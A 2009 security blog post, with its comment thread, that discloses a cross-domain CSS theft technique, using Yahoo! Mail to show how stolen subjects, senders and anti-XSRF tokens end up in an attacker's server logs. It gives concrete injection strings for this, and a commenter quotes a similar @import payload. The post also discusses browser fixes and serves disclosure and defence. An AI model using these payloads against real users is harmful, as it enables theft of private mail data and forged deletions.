Monday, December 28, 2009

Generic cross-browser cross-domain theft

Well, here's a nice little gem for the festive season. I like it for a few distinct reasons:

  1. It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified.

  2. Accordingly, it affected all 5 major browsers. And likely the rest.

  3. You can still be a theft victim even with plugins and JavaScript disabled!
It's much less serious than it could be because there are restrictions on the format of cross-domain data which can be stolen, and the attacker needs to be able to exercise limited control of the target theft page.
The issue is best introduced with an example. The example chosen is deliberately a little bit involved and not too severe. This is to give the upcoming browser updates a chance to get deployed.

Example: Yahoo! Mail cross-domain subject line theft and e-mail deletion

(It's important to note there is no apparent failing of the web app in question here).

  • Step 1: E-mail your victim@yahoo.com with the subject line ');}

  • Step 2: Wait a bit (assume that other e-mails are delivered to the victim at this time)

  • Step 3: E-mail your victim@yahoo.com with the subject line {}body{background-image:url('http://google.com/ and include in the body: PLEASE CLICK http://cevans-app.appspot.com/static/yahoocss.html

  • Step 4: Mild profit if the victim clicks the link.

If you set up the above scenario as a test, you might see something like this in an alert box upon clicking the link:

url(http://google.com/%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3493_AGvHtEQAAWFgSgIzgAlWYQXHqDY&3=q%22%3ESuper%20sensitive%20subject%3C/a%3E%3Cbr/%3E%3Cspan%20class=%22j%22%3EChris%20Evans%3C/span%3E%3C/span%3E%3C/div%3E%3C/div%3E%3Cdiv%20class=%22h%22%3E%3Cdiv%20class=%22i%22%3E%3Cspan%3E%3Ca%20href=%22/p/mail/messageDetail?fid=Inbox&mid=1_3933_AGTHtEQAAM%2FHSgIzawpE8Fwm1%2FI&5=x%22%3E)

The above text is stolen cross-domain, and the interesting pieces are highlighted in bold. The data includes the subjects, senders and "mid" value for all e-mails received between the two set-up e-mails we sent the victim.
Although leaking of subjects and senders is not ideal, it's the "mid" value that interests us most as an attacker. This would appear to be a secure / unguessable ID. Accordingly, it is reasonable for the mail application to rely on it as a distinct anti-XSRF token. This is indeed the case for the "delete" operation, implemented as a simple HTTP GET request. Interestingly, the "forward" operation seems to have an additional anti-XSRF token in the POST body, making the "mid" leak not nearly as serious as it could have been.

That's how this whole attack proceeds in its most powerful form: leak a small amount of text cross-domain, and then bingo! if the leaked text happens to include a global anti-XSRF token.

How does it work?

It works by abusing the standards relating to the loading of CSS style sheets. Approximately, the standards are:

  • Send cookies on any load of CSS, including cross-domain.

  • When parsing the returned CSS, ignore any amount of crap leading up to a valid CSS descriptor.
By controlling a little bit of text in the victim domain, the attacker can inject what appears to be a valid CSS string. It does not matter what proceeds this CSS string: HTML, binary data, JSON, XML. The CSS parser will ruthlessly hunt down any CSS constructs within whatever blob is pulled from the victim's domain. To the CSS parser, the text in the above attack looks like this:

(some HTML junk; whatever){} body{background-image:url('http://google.com/%3C/a...stolen stuff...')}(some trailing HTML junk)

So, the background of the attacker's page will be styled with a background image loaded from an URL, the path of which contains stolen data! One lovely twist of using a CSS string which is an URL is that it will be automatically fetched even if JavaScript is turned off! The stolen data is then harvested by the attacker from their web server logs.
Fortunately, there are various barriers to exploiting this:

  • Any newlines in the injected string break the CSS parse. This is a very common condition which stops potentially serious attacks.

  • CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string.

  • The attacker needs control of two injection points: pre-string and post-string. For many sensitive pages, the attacker won't have sufficient influence over the page data via URL params or reflection of attacker data.
General areas that are more susceptible to this attack include:

  • JSON / XML feeds (common lack of newlines; no requirement to escape " (JSON strings) or ' (XML text nodes)).

  • Socially-related websites (the victim is always browsing attacker-controlled strings such as comments on their mundane photos, etc).

How do we fix it?

It would be nice to be able to not send cookies for cross-domain CSS loads; however that would certainly break stuff and it's hard to measure what without actually causing the breakage.

It would be nice to be strict on the MIME type when loading CSS resources -- if not globally then at least for cross-domain loads. But this breaks high profile sites, *cough* configure.dell.com and text/plain *cough*. (To be fair, it gets much worse with many sites even using text/html, application/octet-stream, it goes on).

A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken. This is the approach I used in my pending WebKit patch.

Note that fixing this issue also fixes my previous attack of using cross-domain CSS to reliably tell if someone is logged in or not:

http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html

Credits

  • Aaron Sigel, for interesting discussions about using /* styled multi-line comments to bypass the newline restriction. Looks like it's not possible to recover comment text but we didn't test all the browsers.

  • Opera, for seemingly fixing this in v10.10 - although I don't know the exact heuristic used.

  • The WebKit and Mozilla communities for good feedback on approaches and patches.

20 comments:

Asirap said...

Sweet P.O.C. I'd actually be really curious how many legit pages break if you prevented cookies being sent with cross-domain CSS loads. I wouldn't expect this number to be too high, though I agree that stricter CSS validation is the better route.

jd said...

Shouldn't the mimetype prevent yahoocss.html from loading the email as a stylesheet?

Chris Evans said...

@jd: No, browsers will ignore the MIME type (unless they are in standards mode, but this is not a default configuration and the evil page loading the CSS can often change modes itself). The reason browsers ignore the MIME type to load CSS is that there are unfortunately a bunch of web sites out there that serve CSS with broken MIME types.

Anonymous said...

How is it not the application's fault if the attack relies on being able to inject code? I don't see how this is any different than the traditional JavaScript injection attacks, except that this uses CSS and works with JS disabled.

What is it that developers should never trust? Oh yeah, it's user submitted data.

Chris Evans said...

@Anonymous: I recommend a more careful reading of the blog post carefully. What's the bug in Yahoo! Mail? (there isn't one). We're not talking about a JavaScript injection (caused by failure to HTML escape, JS escape, etc). We're talking about making a CSS construct appear in the victim's page / feed / JSON API / etc. This uses characters such as { which remain intact even with correct escaping in the application.

Anonymous said...

And if the injected subject line doesn't use a single or double quote, the attack doesn't work, now does it? You said it yourself:

"CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string."

I don't know how I could read that any differently. Either single/double quotes are escaped properly or they aren't. If they aren't, the application is at fault, it doesn't matter what kind of application it is.

Chris Evans said...

@Anonymous: ah, thanks for the clarification, now I see the bit you're missing. You do ask a good question. The HTML characters it is mandatory to escape vary depending on context. For example, inside a "-quoted HTML attribute value, you absolutely need to escape " characters. However inside of a tag, such as hello"quote things are different. There are similar subtleties to the escaping rules for XML and JSON, involving ' vs " that make those particularly interesting vectors too.

Chris Evans said...

Ehh... my bold tag got parsed, hello"quote should be surrounded by a b tag in the example.

tentacoloViola said...

Hi Chris, kudos for your research, i've found it very interesting. However i think there is another constraint for this technique to work: http requests for css are done using GET so it is impossible to perform a cross domain theft on resources that are retrieved through POST requests. do you agree?

Chris Evans said...

@tentacoloViola: Yes :)

Isaac said...

Hey Chris, been a while ;D. This reminds me of the CSS injection bug found by a guy over here:
http://d.hatena.ne.jp/ofk/20081111/1226407593. If you can inject portions of CSS into a field and have it displayed, ie6 (maybe 7?) would parse it as valid css and allow you to read data contained in the field. for example using a css import: @import url("http://google.co.jp/search?source=ig&hl=en&rlz=&=&q={}body{font-family:");
Then you were able to read portions of the document like: alert(document.body.currentStyle.fontFamily).

Anonymous said...

You could just escape characters like { to { and : to : but you shouldn't have to resort to that!

bcdalai said...

This is very important article for everyone and especially to me. Because I'm using many web services with networking and micro-blogging tools that often use cross-domain CSS. And Thanks to Chris Evans.

Anonymous said...

Scary!
Would this "vector" be broken, if one denies "third party" cookies ?

mu said...

Scary!
Would this "vector" be broken, if one denies "third party" cookies ?

yes

James Kettle said...

That is a brilliant technique. Thanks for sharing it. These rareish flaws stack up.

kozmic said...

You mention talking with different browser vendors, have anyone beside Opera implemented fixes? If so it would be interesting to know what approach they have taken.

Buge said...

@mu

I'm pretty sure you're wrong. Third party cookies have to do with how cookies are set.

This exploit doesn't involve setting any cookies in weird ways. It just sends the cookies in weird ways.

Anonymous said...

First shouldn't "A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken." use only if instead of iff(if and only if) as that's interpreted that you may only use well formed CSS if it's cross-domain and the MIME type is broken; Which implies Presuming that iff takes precedence over 'and' that you may not use well formed CSS if it's a same domain request, else if and takes precedence over and then it implies that you may not use well formed CSS on a request which is on the same domain and has a valid MIME type. Anyway that's not too important, jut being a bit pedantic, perhaps I'm wrong.

Now my question, I know this is an old post and things may have been different back then but hasn't CSS only ever been parsed inside of a designated area such as a style tag or the style attribute, if so why would user input ever end up in there in the Yahoo email subject. The example doesn't explicitly state you added an element also from your comments it'd seem that there was no HTML injection so I don't see how that could have even been parsed as CSS instead of just plain text or rather HTML.

In addition I had to re-read the article and comments to presume you mean that the link to "http://cevans-app.appspot.com/static/yahoocss.html" will be requested and included into the document as a CSS document I fail to see how. First it's included part way through a background-image: url(); argument, the actual domain being requested should be a google.com and everything following should be part of the requested URI and not a new request which isn't much of a problem you control the initial URL anyway so you could change that to your malicious domain okay so the request is made as if to an image which could contain it's own style tags which would get parsed, but this doesn't explain why aforementioned URI is relevant. I assume you were saying that the background-img would be parsed and the XSRF tokens would be contained in the URI could be used to forge a GET request by the requested background-image URI ?

so to re-iterate why would the CSS parser pass the entire document? Isn't the entire point of the style tag/attribute to indicate where CSS exists and should be parsed from.
And why what relevance has the second link in the background-img URI?

Anonymous said...

You had me until you said "an URL".